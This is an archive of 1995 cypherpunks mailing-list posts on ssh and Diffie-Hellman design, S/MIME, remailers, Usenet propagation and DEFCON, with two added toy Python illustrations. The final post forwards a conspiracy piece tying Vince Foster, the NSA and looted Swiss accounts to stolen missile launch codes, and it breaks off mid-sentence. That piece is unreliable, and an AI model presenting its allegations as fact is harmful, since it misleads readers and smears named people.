From: Allen Robinson <sebaygo@intellinet.com>
Date: Sun, 23 Jul 95 11:08:13 PDT
To: cypherpunks@toad.com
Subject: NOISE: advice on applications
Message-ID: <Pine.3.89.9507231343.B406-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



I've just recently set up a PPP account, mainly so I could 
run Netscape.  I'm thinking of adding PC Eudora for mail.
Any advice on a good newsreader and any other applications
it would be handy to have?

Thanks.

AR

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
 "Government, even in its best state, is but a necessary evil; in its 
  worst state, an intolerable one."    - Thomas Paine, _Common Sense_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson..................................sebaygo@intellinet.com
PGP public key AD022AA9  fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A
  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@ulf.mali.sub.org (Ulf Moeller)
Date: Sun, 23 Jul 95 07:59:01 PDT
To: cypherpunks@toad.com
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <9507121550.AA10682@snark.imsi.com>
Message-ID: <m0sZzla-000BIdC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9507121550.AA10682@snark.imsi.com> you write:

>I've heard that standard 1920s-1950s one time pad generation
>techniques involved telling lots of secretaries in the code section to
>type numbers at random onto carbon paper forms. No joke.

In the German book `Kryptologie' by F.L. Bauer there is a reprint of
such a Soviet "random number sheet".
-- 
Ulf Möller * um@ulf.mali.sub.org * 3umoelle@informatik.uni-hamburg.de
PGP key fingerprint: B6 4F 97 28 8F C0 54 C3  A6 10 02 2F B9 31 78 14 
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeremym@jax.jaxnet.com (Jeremy Mineweaser)
Date: Sun, 23 Jul 95 11:20:18 PDT
To: cypherpunks@toad.com
Subject: Re: Anyone going to DEFCON
Message-ID: <199507231822.OAA11621@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>As chance has it, I will be vacationing in Las Vegas July 29 - August 6. 
>Is anyone else planning on going to DEFCON?
>
>Sam

I'm planning to attend all of DefCon III.  I, for one, am anxious to meet
Bruce Schneier.  AFAIK, there will be time for Q&A during the Con, and I'd
be happy to ask questions for anyone who won't be able to attend.

.jeremy

---
Jeremy Mineweaser               | GE  d(++)  H- s+:- g-  p1+ au a18 w+ v++ 
jeremym@jax.jaxnet.com          | C++  L++++  P+>+++ L+  3+  E- N++>+++ K-
http://www.jaxnet.com/~jeremym  | W++@ M-- V- po+ Y++ t++ 5 j+ R+++ G? tv-
Finger for PGP key              | b++  D++  B--  e u---(**) h! f+ n---- y?
http://dcs.ex.ac.uk/~aba/x.html | *ai*vr*vx*crypto*ITAR*unix*data havens*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 23 Jul 95 04:45:41 PDT
To: mazieres@pa.dec.com
Subject: ssh protocol
In-Reply-To: <9507230027.AA10524@venus.pa.dec.com>
Message-ID: <199507231145.OAA04620@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


People have also suggested using the Photuris protocol that is part of
the IP Security work being done at IETF
(ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt).

The basic idea behind the protocol goes roughly like this:
  1. Exchange session keys using Diffie-Hellman
  2. Each side sends a signature of the Diffie-Hellman exchange (the
     signature can be with any of a number of algorithms; RSA and
     Elliptic Curve systems have been defined).

If this were adapted to ssh, the protocol would look roughly like
this:
  1. Exchange session keys using Diffie-Hellman
  2. Each side sends a signature of the Diffie-Hellman exchange by its
     host key
  3. RSA and Rhosts authentication requests would include a signature
     by the requesting key.

This would get rid of the server key and the need to regenerate it,
because the Diffie-Hellman exchange already prevents decrypting old
conversations.  The challenge-dialogs could be avoided (unless they
are needed for performance reasons to avoid unnecessary signature
computations).

One could also eliminate RSA in future and start using some other
public key cryptosystem if desired.  The Diffie-Hellman patent and the
generic public key patent expire in 1997; the RSA-patent does not
expire until about year 2000.


Anyway, this would be a major change that probably cannot easily be
made compatibly.  Maybe an incompatible ssh-2.x?  Anyway, I don't want
to rush into making major changes in the protocol.

I would very much like to hear comments on this approach.

    Tatu
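
An added sketch of steps 1 and 2 of the adapted exchange in the message above, for the server side only: the host key signs the Diffie-Hellman public values, so a client that knows the host's public key rejects an exchange whose values were swapped in transit. This is not ssh or Photuris code; the Mersenne-prime group, the textbook RSA host key built from Mersenne primes, and all function names are constructed assumptions, far too weak for real use.

```python
import hashlib
import secrets

# Constructed toy parameters (assumptions of this example, not for real use).
P = 2**521 - 1   # Mersenne prime used as the Diffie-Hellman modulus
G = 3
E = 65537        # RSA public exponent


def make_host_key(p: int, q: int):
    """Textbook RSA key pair from two primes: returns (public, private)."""
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return (n, E), (n, d)


def exchange_digest(n: int, client_pub: int, server_pub: int) -> int:
    """Hash both Diffie-Hellman public values into a number below n."""
    data = f"{client_pub}|{server_pub}".encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign_exchange(private, client_pub: int, server_pub: int) -> int:
    n, d = private
    return pow(exchange_digest(n, client_pub, server_pub), d, n)


def verify_exchange(public, client_pub: int, server_pub: int, sig: int) -> bool:
    n, e = public
    return pow(sig, e, n) == exchange_digest(n, client_pub, server_pub)


def dh_keypair():
    """Fresh per-session Diffie-Hellman secret and public value."""
    x = secrets.randbelow(P - 3) + 2
    return x, pow(G, x, P)


def session_key(private: int, peer_pub: int) -> str:
    return hashlib.sha256(str(pow(peer_pub, private, P)).encode()).hexdigest()


def handshake(host_public, host_private, tampered: bool = False):
    """Run one exchange; returns (client_accepts, client_key, server_key)."""
    c_priv, c_pub = dh_keypair()
    s_priv, s_pub = dh_keypair()
    seen_by_server, seen_by_client = c_pub, s_pub
    if tampered:
        # Someone on the path replaces the public value in both directions.
        _, m_pub = dh_keypair()
        seen_by_server, seen_by_client = m_pub, m_pub
    # Step 2: the server signs the exchange as it saw it, with its host key.
    sig = sign_exchange(host_private, seen_by_server, s_pub)
    # The client checks the signature against what it sent and what it received.
    ok = verify_exchange(host_public, c_pub, seen_by_client, sig)
    return ok, session_key(c_priv, seen_by_client), session_key(s_priv, seen_by_server)


# Constructed host key from two Mersenne primes (trivially factorable, demo only).
HOST_PUBLIC, HOST_PRIVATE = make_host_key(2**607 - 1, 2**1279 - 1)

if __name__ == "__main__":
    print(handshake(HOST_PUBLIC, HOST_PRIVATE)[0])                  # True
    print(handshake(HOST_PUBLIC, HOST_PRIVATE, tampered=True)[0])   # False
```
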




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 12:59:08 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Netscape the Big Win
In-Reply-To: <9507211413.AA25887@sulphur.osf.org>
Message-ID: <9507231958.AA00910@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> > Well, X.509 for now. The Eastlake-Kaufman DNS Security work
> > (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
> > --now proposed standard, awaiting an RFC number) promise to give us
> > a non-X.509 certification structure for the Internet.
> 
> I have serious concerns about whether the DNS stuff will really scale.
> It's gonna blow out DNS server memory use, and the bigger packets means
> a *lot* more TCP (vs UDP) activity.

I'm not that worried. HESIOD has already shown that you can afford to
store really mongo databases in the DNS, and with caching I suspect
the TCP activity isn't going to be over very wide distances for the
most part. However, we will likely find out the answers in the next
few months.

Perry

PS Cypherpunks write code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 13:08:42 PDT
To: jim@acm.org
Subject: Re: It had to happen...
In-Reply-To: <199507211714.KAA19175@mycroft.rand.org>
Message-ID: <9507232008.AA02294@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> 
> > "Perry E. Metzger" <perry@imsi.com> writes:
> > They [NSA] also have a Fortezza based web security system. One of their guys
> > was discussing some of that here at IETF.
> 
> Are their Fortezza keys escrowed[?]

Is the Pope a Catholic?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 23 Jul 95 13:20:06 PDT
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: HOUDINI ON CRYPTO
Message-ID: <v02130500ac384a4bd799@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 23:53 7/22/95, Samuel Kaplin wrote:
>On Sat, 22 Jul 1995, Sandy Sandfort wrote:
>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                           SANDY SANDFORT
>>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>>
>> C'punks,
>>
>> Blanc wrote:
>>
>> >>            PRSRVYPRFCTMNVRKPTHSPRCPTSTN
>> > ....................................
>> >
>> > It looks to be something like this to me:
>> >
>> > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN
>>
>> Close, very close.
>>
>>
>>  S a n d y
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>Preserve ye perfect men ever keep the precepts ten
>
>(As in Commandments!)


In that case you gave an incorrect message to decode (by adding vowels)
since your expansion/decode had no S between the TH of "THe" and the PRCPTS
of "PReCePTS" <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 14:19:13 PDT
To: Bob Snyder <rsnyder@janet.advsys.com>
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <199507231254.IAA22648@janet.advsys.com>
Message-ID: <9507232116.AA12258@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Bob Snyder writes:
> tcmay@sensemedia.net said:
> > With regard to SSL and Netscape not being open to outside developers, 
> > several leading e-mail outfits, including Qualcomm, Netscape, 
> > Frontier, etc., are working on an interoperable secure e-mail 
> > standard called "Secure/MIME," or "S/MIME." 
> 
> Do you have sources for this information?  MOSS is out there at least as an 
> Internet Draft,

In fact, MOSS is now a Proposed Standard.

> and possibly further along, and Steve Dorner of Qualcomm, the
> original author of Eudora, is pretty active in the MIME community
> and I doubt he would support a second MIME type to do the same
> thing...

I would guess the same.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Sun, 23 Jul 95 14:49:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: S.974 Action, & Senate Judiciary Subcommittees
Message-ID: <9507232149.AA05185@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[please don't cc: me on any replies also directed to cypherpunks@toad]

Paul Elliott asked about the subcommittee referral of S.974 in the Senate
Judiciary Committee. Although I've never done more in Arizona than loiter in
the Phoenix airport, a staffer in Sen. Kyl's office kindly responded to my
request for information about Judiciary subcmtes. and action on S.974 (on a
Sunday, no less !)

Charles Grassley (R-IA) is the primary sponsor of S.974, and Jon Kyl (R-AZ)
is the cosponsor. 

Sen. Grassley chairs the Subcmte. on Administrative Oversight & the Courts, 
(202) 224-6736. Sen. Leahy (D-VT), who's sponsoring an alternative to the
CDT, also sits on this subcommittee.

Sen. Kyl sits on the Subcmte. on the Constitution, Federalism & Property 
Rights, (202) 224-8081. Sen. Feingold (D-CO), who has spoken out against
the CDT, is also a member of this subcommittee.

Both Grassley & Kyl are on the Immigration Subcmte., (202) 224-6098, but it's
hard to see why the bill would get referred there.

The Subcmte. on Terrorism, Technology & Government Information, 
(202) 224-6791, might take an interest in S.974, but neither Grassley nor
Kyl sits on it. Leahy belongs to this subcmte.

There's no sign in the Congressional Quarterly synopsis of any subcommittee
referral of S.974 thus far:

Forwarded from info@kyl.senate.gov:
> 1 of 1 items                                CQ's WASHINGTON ALERT  07/23/95
> 
> *** FULL REPORT -- DIGEST, LEGISLATIVE ACTION, COSPONSORS, SPEECHES ***
> 
> MEASURE:         S974
> 
> SPONSOR:         Grassley (R-IA)
> 
> BRIEF TITLE:     Anti-Electronic Racketeering Act of 1995.
> 
> OFFICIAL TITLE:  A bill to prohibit certain acts involving the use of
>                  computers in the furtherance of crimes, and for other
>                  purposes.
> 
> INTRODUCED:      06/27/95
> 
> COSPONSORS:      1 (Dems: 0  Reps: 1  Ind: 0)
> 
> COMMITTEES:      Senate Judiciary
> 
> SHORT TITLE AS INTRODUCED:
>   Anti-Electronic Racketerring [sic] Act of 1995
> 
> CRS SUBJECT INDEX TERMS:
>   Crime and criminals
>   Actions and defenses
>   Civil liberties
>   Computer crimes
>   Computer networks
>   Computer software
>   Criminal justice
>   Damages
>   Data banks
>   Destruction of property
>   Electronic surveillance
>   Evidence (Law)
>   Jurisdiction
>   Law
>   Legal fees
>   Money laundering
>   Organized crime
>   Right of privacy
>   Searches and seizures
>   Technology
>   Wiretapping
> 
> 
> LEGISLATIVE ACTION:
> 
> 06/27/95 Referred to Committee on the Judiciary (Text of bill
>          appears on pgs. S9180-S9181 of the June 27, 1995,
>          Congressional Record) (CR p. S9174)
> 
> 06/27/95     GRASSLEY, R-Iowa, Senate speech: Introduces the
>              Anti-Electronic Racketeering Act of 1995. (Text of
>              bill) (CR p. S9180-S9181)
> 
> 07/20/95 Cosponsor(s) added: 1
>   Kyl (R-AZ)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Sun, 23 Jul 95 15:14:55 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Remailers & local newsgroups
In-Reply-To: <199507230506.WAA07551@goblin.punk.net>
Message-ID: <9507232214.AA05350@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[cc:ed to remailer-operators; I suggest replies to the latter]

The Checkered Daemon writes:
> Do any of the posting remailers accept the inclusion of regional usenets
> in their active files so that people can use them to post directly to 
> regional newsgroups?

Last I heard, Julf generally honors requests for penet.fi to carry additional
groups. If you don't know the contact address of a particular remailer
operator, remailer-operators@c2.org is probably the best place to try to
get in touch with one. (Most c'punk remailers mention an admin/complaints
address in the headers of their remailed messages.)

Many cpunk/mix remailers these days allow newsgroup posting only via mail2news
gateways, so you may need to convince the operator of one of those to add a
group.

In itself, this doesn't necessarily solve your problem, due to the nature of
Usenet news propagation. Briefly, if a site "upstream" of the posting site in
the propagation tree doesn't carry a certain group, then articles posted only
to that group won't make it out to much of the net. The most popular solution
to this predicament is "piggybacking" -- crossposting an article into a well-
propagated group so that it makes it across holes in the lesser-carried
group's propagation. The *.test groups are often used for this, although
you'll irritate plenty of people if you don't set the Followup-To: on your
article out of the test group. 
 
-Futplex <futplex@pseudonym.com>
"Jeux sans frontieres"
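
The propagation hole and the "piggybacking" workaround described in the message above, as a toy model added here (not part of the original post). The site names, the group example.general and the feed topology are constructed; misc.test stands in for a well-propagated *.test group.

```python
"""Toy model of Usenet flood-fill propagation (added illustration)."""
from collections import deque

# Constructed topology: the groups each site carries and the peers it feeds.
# "backbone" sits between the posting site and the leaves and does NOT carry
# the lesser-propagated group example.general.
SITES = {
    "poster":   {"carries": {"example.general", "misc.test"},
                 "peers": ["backbone"]},
    "backbone": {"carries": {"misc.test"},
                 "peers": ["poster", "leaf-a", "leaf-b"]},
    "leaf-a":   {"carries": {"example.general", "misc.test"},
                 "peers": ["backbone"]},
    "leaf-b":   {"carries": {"misc.test"},
                 "peers": ["backbone"]},
}


def make_article(newsgroups, followup_to=None):
    """Build a minimal article (constructed sample, headers then body)."""
    headers = [
        "From: poster@site.example",
        "Newsgroups: " + ",".join(newsgroups),
        "Subject: regional announcement",
        "Message-ID: <constructed.1@site.example>",
    ]
    if followup_to:
        headers.append("Followup-To: " + ",".join(followup_to))
    return "\n".join(headers) + "\n\nbody text\n"


def header(article, name):
    """Return the comma-separated values of one header as a list."""
    head = article.split("\n\n", 1)[0]
    for line in head.split("\n"):
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return [g.strip() for g in value.split(",") if g.strip()]
    return []


def propagate(article, origin, sites=SITES):
    """Flood the article outward from origin.

    A site accepts the article only if it carries at least one group named
    in Newsgroups:, files it under the groups it does carry, and offers it
    to its peers. Returns {site: groups the article was filed under}.
    """
    groups = set(header(article, "Newsgroups"))
    filed = {}
    queue = deque([origin])
    while queue:
        site = queue.popleft()
        if site in filed:
            continue
        local = groups & sites[site]["carries"]
        if not local:
            continue  # carries none of the groups: article stops here
        filed[site] = local
        queue.extend(p for p in sites[site]["peers"] if p not in filed)
    return filed


def reply_groups(article):
    """Groups a follow-up goes to: Followup-To: if set, else Newsgroups:."""
    return header(article, "Followup-To") or header(article, "Newsgroups")


if __name__ == "__main__":
    single = make_article(["example.general"])
    crossposted = make_article(["example.general", "misc.test"],
                               followup_to=["example.general"])
    print("single group :", propagate(single, "poster"))
    print("piggybacked  :", propagate(crossposted, "poster"))
    print("replies go to:", reply_groups(crossposted))
```

In this model leaf-a carries example.general but only ever sees the article when it also names a group the backbone carries.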



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Sun, 23 Jul 95 16:06:12 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <013.08997009.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> As chance has it, I will be vacationing in Las Vegas July 29 - August 6.
> Is anyone else planning on going to DEFCON? I won't be attending the
> whole thing, just selected excerpts, but if there is a get together let me
> know!

I don't know if anyone else from this list is going but I will be 
there for the whole conference and wouldn't mind meeting up with some 
of the people from this list.  You might want to join the "defcon 
stuff" list.  It is just for people going to DefCon to talk about 
meetings and stuff.  It is dc-stuff@fc.net (I think); if that doesn't 
work, mail me and I'll get it from one of my messages.

Eldon Jenkins





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 23 Jul 95 15:36:17 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d04ac387ca1423a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:32 PM 7/21/95, Timothy C.  May wrote:
>
>No, I don't use any of the "-works" apps, and I think the success of the
>Web speaks for itself... This is not a view I have just come to, as my
>recent message shows.

Agreed.  My posting seemed to get stuck in the response queue to the
original post, and came out a little "dated", I guess...

>
>And I'm not wedded to "Netscape" per se, though that particular environment
>has the current momentum.  I've also used Mosaic and MacWeb to do much the
>same things, but find Netscape smoother.

I agree.  By far the best web-browser out there is Netscape.  They don't
call it Mozilla for nothing.

>
>Out of curiosity, the phrase "grown out of Netscape," aside from the
>implied barb, means what?  Just what am I missing and what do I need to
>"grow out of"?

No.  That seems to be my unintentional verbal style on the net, a little
prickly around the edges.  My actual barbs are so over the top that you'll
never misunderstand them for their subtlety.

What I mean is, that after you've used Netscape, a web client, to read news
for a while, you'll start to think about more specialized applications like
Newswatcher, for instance.

The reason that Netscape has either built-in news reading or mail reading
functions is feature creep.  My hypothesis is that feature creep is brought
about by some combination of venture capitalists, securities analysts, and
"real marketing people", all of which Andreessen at Netscape has in spades,
now, all with their chins on his shoulder saying, "That's nice, what else
will it do?".  In-line gifs or jpegs (or mpegs or whatever) are integral to
the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
I think.  My opinion about e-mail and news is that they're pretty
orthogonal to the functionality of a web-browser.  Kind of like building
wheels on a boat.

>If, perchance, this is just what of those throwaway barbs, implying I move
>from fad to fad (as Fraering's post implied), you should know that I stuck
>with tin/elm/emacs/Eudora for more than 3 years, as nothing obviously
>better--and worth the learning curve to switch to--had come along.  (In the
>Mac domain I used other programs, none of them "-works" packages.)

No, Tim, your mother does *not* wear army boots.  ;-).  I just have several
friends who recently moved to a TCP net feed and thought they only needed
Netscape.  That is, until they used Eudora, and/or Newswatcher (preferably
in its "value added" editions), and switched to them instead for their
respective purposes.

>But, I'll tell you what, I *will* tell you about it in 6 months, whether or
>not I've grown out of Netscape!

Of that we can rest assured.  :-).

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBLOsPgyLN8bw6ZVAQEzbAP/eosm6SNC1TdvduCWlPVO9WDbqlAcQtvj
jL+jsy0QjEgMNwsGQGCQBAHMXxtOJC2GPC+lGVfGZcTDFljvgzhBJc2/QWI0mQcK
Jz/vdYGfxhkBSlW0Xm+zcilmyYgvMr/KeIeJUcExYyVSSWpof7fuSG6jkfVmTWZ5
JDSHHd922U4=
=ipGf
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Sun, 23 Jul 95 15:39:50 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507221301.AA27475@tyrell.net>
Message-ID: <199507232239.SAA32575@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> I was under the impression that there was a lot of common code
> between the Mixmaster client and server versions, at least in
> the current version.
> 
> Does it have to be the case, then, that we even have separate client
> and server versions? If a new program is going to be written in Java,
> can't it have the functionality of both client and server?

Indeed, that's the way the C version works now:

[from README.client in the Mixmaster distribution]:
# Mixmaster uses the same source & binary for the remailer program and the
# client program. Setting up a client, however, is significantly easier.

> Why not "charge" for the ability to send an anonymous message with
> the duty to have for a short time (maybe an hour or two) running on
> your machine a node in a remailer network?

It would be interesting to see how the market would react to this. There
might be quite a bit of reluctance to take on the liability of a remailer
operator just to send an anonymous message (maybe that's a good thing ;)

Some mechanism would need to be worked out to tie delivery of each message
to satisfactory performance of its true originating address, without making
it much easier for an opponent to tie a message to its point of origin.

-Futplex <futplex@pseudonym.com>
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 23 Jul 95 15:58:43 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d0aac388454110e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
                                                           ^^^

Onk?

Revenge of the spellchecker (Spellswell in this case). Of course, I mean FTP.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 23 Jul 95 17:09:15 PDT
To: cypherpunks@toad.com
Subject: Kalliste re. Foster / NSA, VII
Message-ID: <Pine.SOL.3.91.950723200122.20174A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


From KALLISTE@delphi.com Fri Jul 21 10:59:41 1995
Date: Fri, 21 Jul 1995 04:04:35 -0400 (EDT)
From: KALLISTE@delphi.com
Subject: Part VII

-----BEGIN PGP SIGNED MESSAGE-----


          Allegations Regarding Vince Foster, the NSA, and 
                Banking Transactions Spying, Part VII

                        by J. Orlin Grabbe
        
        It has come time to talk of Vince Foster and virtual 
        realities.

        1.  One type of virtual reality immersion takes place every 
        evening with respect to network news.  One sits in a familiar 
        chair, and watches familiar faces on familiar channels telling 
        soothing or alarming things about other parts of the world--other 
        realities--of which the viewer has no experience, all of it 
        demonstrated by reality-simulating sound bites and video clips.  

        The virtual reality construction is good if the story sounds 
        plausible.  That is, after all, the job of a TV reporter:  
        to tell a plausible story and to entertain our eyes by looking 
        good while telling it.  
        
        The pulp magazine reporter, on the other hand, must tell 
        a plausible story and keep it lurid enough to grab our 
        imagination.  Take the allegedly important question of "child 
        porn on the Internet," recently paraded forth by *Time* 
        magazine.  To the computer-impaired, pedophilia might serve 
        as a plausible explanation why anyone would sit for hours in 
        front of a computer screen. Never mind that the neighborhood 
        Internet-user says differently: you can't take the word of a 
        pedophile can you?  
        
        The Internet-user, on the other hand, may believe that rock 
        videos are a more reliable guide to reality than *Time* 
        magazine.  And even if he were actually interested in porn, 
        he might find life easier by going to the local video store 
        where a single video tape could store as much graphical infor-
        mation as could be stored on 2000 digital compact disks.

        2.  Another type of virtual reality is found in the banking
        world.  Money is data stored in a computer.  This money
        is "transferred" place to place by changing the ownership
        labels associated with the data.  Once the computer receives  
        the proper transfer authorization codes, the money can be
        "launched" from one bank to another, from one account to  
        another.  All that is necessary is that one properly
        emulate the reality that is important to the bank computer.

        If you include all the right digital indicators that make it 
        plausible to the computer that you are the authorized transfer 
        person for, say, the account owned by C. Jefferson, the computer 
        will believe you. It won't care about non-virtual reality--what
        C. Jefferson looks like, or what her tastes in clothes are-- 
        nor will the computer have metaphysical doubts to cause it to 
        hesitate in its actions before sending the money on its way.  
        "You" are nothing more than a preselected set of codes.
        
        In the version of Jim Norman's article *Fostergate* published in 
        *Media Bypass* (August 1995), it is stated:  
        
        "For months, a small cadre of CIA computer hackers known as the
        Fifth Column, armed with a Cray supercomputer, had been monitoring
        Foster's Swiss account. . . . Foster was just one of the first
        of scores of high level U.S. political figures to thus have their
        secret Swiss accounts looted of illicit funds . . . . Over the
        past two years . . . more than $2 billion has been swept out of 
        offshore bank accounts belonging to figures connected to the 
        U.S. government with nary a peep from the victims or their
        banks."
                
        Where did the money in the accounts come from?  Jim Norman doesn't 
        say.  I assert that some of this loot is defense and arms dealing 
        payola; some of it is drug dealing profits or payola; and some of
        it is payola from the floating fortune left by a forgotten oil man--
        whose money moves from bank to bank in a merry-go-round to keep 
        its location hidden from the potential heirs.

        And some of the loot was paid in an attempt to allow one nation 
        to become a VIRTUAL NUCLEAR POWER.
                                
        3.  Missile launches take place in a virtual reality.  Given 
        the proper launch code, the missile will attempt to go to its 
        programmed destination without further theological debate.
                
        A country possessing the launch codes and also targeting infor-
        mation for *another* country's nuclear missiles could become a 
        virtual nuclear power. (The targeting information would be as
        important as the launch codes.  For before you launched a missile, 
        you would first want to know where it is going. After all, it 
        could be aimed at you.)  Getting your nuclear arms this way would 
        have obvious economic advantages: someone else would foot the 
        military bill.

        Jim Norman states in *Fostergate*:  
        
        "According to a heavily-redacted New Mexico FBI counter-
        intelligence report, Maxwell was apparently allowed to sell
        two copies of PROMIS back to the U.S. weapons labs at
        Sandia and Los Alamos, for what Inslaw claims was a hugely
        inflated price of $87 million.  That would have allowed
        Pollard, if he was using the rigged program, to obtain U.S.
        missile targeting data long before Israel had its own
        satellite capability, thus making it a real nuclear threat
        to the Soviet Union."
        
        Well, yes, it could make Israel a real threat to the Soviet 
        Union.  But not from Israel's own puny missile program.  
        Rather, Israel could be a threat to the Soviet Union because it 
        would be able to launch our (U.S.) missiles at the Soviet Union.

        Being a virtual nuclear power would mean not having to say you 
        are sorry.  If a U.S. missile were launched at Russia, the defense 
        system of Russia would, in its virtual view of the world, see the 
        missile as coming from the U.S.  It would launch a retaliatory 
        strike against the U.S., because in its reality only the U.S. could 
        be responsible.  It wouldn't be programmed to recognize "Missile 
        from U.S. not U.S.-intended action."

        Being a virtual nuclear power means you could *blackmail people 
        in both directions*: you could blackmail the targeted city or area.  
        More importantly, you could blackmail the U.S. If the U.S. doesn't 
        go along with your demands, why, you could involve it in a nuclear 
        war in which you would be a spectator, not a participant.  The 
        U.S. would know it has more to lose than you do, so it would give 
        in to your demands.

        Vince Foster's NSA connections wouldn't give him access to such 
        launch codes and targeting data. Not even with the help of Jonathan 
        Pollard. It would take the cooperation of a small circle of 
        friends--friends with Defense and Intelligence connections.  
        People with access. People with authority.    

        Would any of the U.S.'s own Defense Department or Intelligence 
        personnel in the 1980s or the 1990s, people other than Jonathan 
        Pollard, have been involved in such a transfer of information to 
        a foreign power--whether to Israel or to anyone else?

        Surely not anyone connected to the account numbers KPFBMMBODB 
        or KPFBMMBODE held at the Union Bank of Switzerland?  Please, 
        say it ain't so.

        For if they were, the U.S. may now be facing its greatest 
        National Security threat since the Cuban Missile Crisis.  And
        that's why everyone has an interest in covering up the various 
        threads connected to the death of Vince Foster.  Some are scurrying 
        around, hoping no one will realize how bad things are before 
        the mess can be cleaned up.  Others are scurrying around, just 
        covering their asses.  It's showdown time, with no space for 
        killing all the remaining witnesses or burying all the remaining 
        evidence.  It's showdown time, and the money people thought they 
        had for ammo is missing from their Swiss accounts.

        The levels of disinformation have already been prepared.  The
        first level says Vince Foster was just a political flack who  
        committed suicide.  The next one says, yeah, he was into some
        nasty stuff like money laundering, but had no intelligence
        connections.  The next one beyond that allows him to work for
        the NSA, but not for long or in a very important position.  
        The next one allows Foster to sell some nuclear secrets to
        Israel, but that was just to accelerate their own nuclear program,
